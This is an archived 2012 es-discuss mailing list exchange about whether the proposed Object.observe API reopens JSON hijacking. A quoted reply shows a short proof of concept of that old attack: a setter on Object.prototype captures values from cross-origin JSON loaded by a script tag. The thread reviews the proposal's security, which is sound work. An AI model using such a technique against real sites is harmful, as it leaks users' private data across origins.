Experimental implementation of Object.observe & JS Utility library now available

Andrea Giammarchi andrea.giammarchi at gmail.com
Fri Aug 17 06:31:45 PDT 2012


that object has to be created first, than parsed to Object.observe ... even
evaluating this:

 [Object.observe({"x":"stolen"}, dangerousStuff)]

nothing will happen since the object has been defined already

;)

On Fri, Aug 17, 2012 at 2:21 PM, gaz Heyes <gazheyes at gmail.com> wrote:

> On 17 August 2012 13:47, Rafael Weinstein <rafaelw at chromium.org> wrote:
>
>> Hi gaz,
>>
>> Thanks so much for your time.
>>
>> Much care has been taking with this proposal to ensure that it is
>> neutral with respect to the existing JS Object/Security model.
>>
>> As I understand it, the core vulnerability with JSON hacking is the
>> ability to define getters on the Object prototype. Object.observe()
>> does not affect that ability.
>>
>
> The original attack I'm talking about is this:
> //variant of the "I know what your friends did last summer" attack
> //
> http://www.thespanner.co.uk/2009/01/07/i-know-what-your-friends-did-last-summer/
> <script>
> Object.defineProperty(Object.prototype, "x", {
>  set:function(val){
>    alert(val);
>  }
> });
> </script>
> <script src="//some.external.site/friends.json"></script>
> <!-- friends.json contains [{"x":"stolen"}] -->
>
> This was patched to prevent the setter being called on a new object
> literal but I guess if the observable stuff doesn't account for this then
> it's a problem. It seems like you account for this which is cool.
>
> _______________________________________________
> es-discuss mailing list
> es-discuss at mozilla.org
> https://mail.mozilla.org/listinfo/es-discuss
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.mozilla.org/pipermail/es-discuss/attachments/20120817/9e635e9b/attachment.html>


More information about the es-discuss mailing list